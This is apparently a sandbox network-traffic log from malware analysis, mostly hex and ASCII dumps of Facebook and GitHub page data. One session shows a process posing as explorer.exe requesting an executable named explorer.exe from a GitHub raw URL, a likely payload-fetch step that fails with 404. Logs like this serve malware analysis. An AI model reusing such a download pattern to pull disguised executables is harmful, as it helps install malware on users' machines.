                                                                                                                                  2022-10-17 20:07:09 UTC426INData Raw: 31 64 34 38 0d 0a 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 45 35 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 45 35 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 2b 6e 22 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 55 73 65 53 69 6e 67 6c 65 4c 65 76 65 6c 4d 61 6e 61 67 65 44 69 61 6c 6f 67 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64
                                                                                                                                  Data Ascii: 1d48","init",["__elem_ec77afbd_0_0_E5","__inst_02182015_0_0_nE"],[{"__m":"__elem_ec77afbd_0_0_E5"},{"__m":"__inst_02182015_0_0_nE"},"en_US",true,"Facebook"]],["__inst_ead1e565_0_0_+n"],["WebCookieUseSingleLevelManageDialogController","init",["__inst_ead
                                                                                                                                  2022-10-17 20:07:09 UTC427INData Raw: 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 58 58 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 38 62 22 7d 5d 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6e 45 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 30 45 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 77 7a 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 54 43 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 35 5f 54 43 22
                                                                                                                                  Data Ascii: ,{"__m":"__elem_a588f507_0_4_XX"},{"__m":"__elem_70b16c69_0_0_8b"}]],["PageTransitions"],["__inst_02182015_0_0_nE"],["__inst_e5ad243d_0_0_0E"],["__inst_1de146dc_0_0_wz"],["CookieAccordion","init",["__elem_a588f507_0_5_TC"],[{"__m":"__elem_a588f507_0_5_TC"
                                                                                                                                  2022-10-17 20:07:09 UTC429INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 6e 6f 77 28 29 2b 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 46 52 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 47 2f 6c 2f 30 2c 63 72 6f 73 73 2f 5a 56 4f 35 73 37 4e 61 47 76 6d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c
                                                                                                                                  Data Ascii: ction(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();</script><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" as="styl
                                                                                                                                  2022-10-17 20:07:09 UTC430INData Raw: 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 72 2f 6c 77 4a 64 4e 72 4a 30 6d 4a 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72
                                                                                                                                  Data Ascii: origin="anonymous" nonce="BgTs8qFM" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="BgTs8qFM" /><link rel="preload" href="https://static.xx.fbcdn.net/r
                                                                                                                                  2022-10-17 20:07:09 UTC432INData Raw: 63 2e 70 68 70 2f 76 33 2f 79 6e 2f 6c 2f 30 2c 63 72 6f 73 73 2f 6b 69 5f 57 4f 5a 50 46 51 59 58 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 69 67 50 69 70 65 29 7b 64 65 66 69 6e 65 28 22 5f 5f 62 69 67 50 69 70 65 22 2c 5b 5d 2c 77 69 6e 64 6f 77 2e 62 69 67 50 69 70 65 3d 6e 65 77 20 42 69 67 50 69 70 65 28 7b 22 66 6f 72 63 65 46 69 6e 69 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b
                                                                                                                                  Data Ascii: c.php/v3/yn/l/0,cross/ki_WOZPFQYX.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{
                                                                                                                                  2022-10-17 20:07:09 UTC433INData Raw: 74 3e 0d 0a 31 38 36 31 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65
                                                                                                                                  Data Ascii: t>1861<script nonce="BgTs8qFM">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="BgTs8qFM">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPage
                                                                                                                                  2022-10-17 20:07:09 UTC435INData Raw: 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c
                                                                                                                                  Data Ascii: jQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:1083117",
                                                                                                                                  2022-10-17 20:07:09 UTC436INData Raw: 56 31 54 68 4f 69 5a 65 6a 5f 32 64 67 31 63 4b 38 49 2d 66 75 66 35 51 75 5a 58 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c
                                                                                                                                  Data Ascii: V1ThOiZej_2dg1cK8I-fuf5QuZXw"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,
                                                                                                                                  2022-10-17 20:07:09 UTC437INData Raw: 45 4c 6e 59 75 7a 43 4d 68 37 6d 37 59 74 70 7a 5a 52 43 66 35 41 72 62 46 42 67 72 4a 56 61 36 44 73 4d 2d 36 66 72 45 53 6c 71 4e 6c 47 65 42 4c 6f 65 4e 4c 4c 36 7a 67 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 4e 30 6a 33 47 56 6b 65 6e 66 6f 6f 33 61 58 33 71 5a 53 58 4b 44 6f 32 38 4a 56 4b 74 74 72 6c 59 79 36 67 79 4b 7a 73 4e 62 72 67 70 50 30 61 72 76 4d 56 31 54 68 4f 69 5a 65 6a 5f 32 64 67 31 63 4b 38 49 2d 66 75 66 35 51 75 5a 58 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70
                                                                                                                                  Data Ascii: ELnYuzCMh7m7YtpzZRCf5ArbFBgrJVa6DsM-6frESlqNlGeBLoeNLL6zgQ"]},-1],["cr:983844",[],{__rc:[null,"Aa2N0j3GVkenfoo3aX3qZSXKDo28JVKttrlYy6gyKzsNbrgpP0arvMV1ThOiZej_2dg1cK8I-fuf5QuZXw"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-p
                                                                                                                                  2022-10-17 20:07:09 UTC439INData Raw: 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 0d 0a
                                                                                                                                  Data Ascii: xzaOPogzLZb4"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                                  2022-10-17 20:07:09 UTC439INData Raw: 39 64 31 0d 0a 42 44 43 6c 69 65 6e 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 54 72 69 67 67 65 72 22 2c 22 73 74 61 72 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 5b 5d 2c 5b 7b 73 63 3a 22 7b 5c 22 74 5c 22 3a 31 36 35 39 30 38 30 33 34 35 2c 5c 22 63 5c 22 3a 5b 5b 33 30 30 30 30 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 31 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 32 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 33 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 34 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 35 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 36 2c 35 37 33 35 38 35 5d 2c 5b 33 30 30 30 37 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 38 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 32 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 33 2c 38 33
                                                                                                                                  Data Ascii: 9d1BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,83
                                                                                                                                  2022-10-17 20:07:09 UTC441INData Raw: 73 65 72 22 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 37 34 33 30 39 35 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a 31 7d 7d 2c 67 6b 78 44 61 74 61 3a 7b 22 31 36 35 32 38 34 33 22 3a 7b 72 65 73 75 6c 74 3a 66 61 6c 73 65 2c 68 61 73 68 3a 22 41 54 36 75 68 39 4e 57 52 59 34 51 45 51 6f 59 30 61 4d 22 7d 7d 7d 2c 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 2c 72 73 72 63 4d 61 70 3a 7b 7a 50 59 6c 54 79 6c 3a 7b 74 79 70 65 3a 22 6a 73 22 2c 73 72 63 3a 22 68 74 74 70 73
                                                                                                                                  Data Ascii: ser"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY0aM"}}},hblp:{consistency:{rev:1006402711},rsrcMap:{zPYlTyl:{type:"js",src:"https


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549707140.82.121.3443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:12 UTC442OUTGET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: github.com
                                                                                                                                  2022-10-17 20:07:12 UTC442INHTTP/1.1 404 Not Found
                                                                                                                                  Server: GitHub.com
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                  Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                  2022-10-17 20:07:12 UTC442INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                  2022-10-17 20:07:12 UTC444INData Raw: 31 38 37 45 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                                                  Data Ascii: 187E<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                                                  2022-10-17 20:07:12 UTC445INData Raw: 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                  Data Ascii: mages.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https:
                                                                                                                                  2022-10-17 20:07:12 UTC446INData Raw: 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74
                                                                                                                                  Data Ascii: eme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet
                                                                                                                                  2022-10-17 20:07:12 UTC447INData Raw: 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 31 39 61 64 38 61 61 65 61 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: </script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-019ad8aaeab3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https
                                                                                                                                  2022-10-17 20:07:12 UTC449INData Raw: 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 2d 36 61 35 62 66 66 2d 39 33 65 64 64 31 38 64 61 62 31 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                  Data Ascii: lication/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--6a5bff-93edd18dab1d.js"></script><script crossorigin="anonymous" defer="defer" type="applicatio
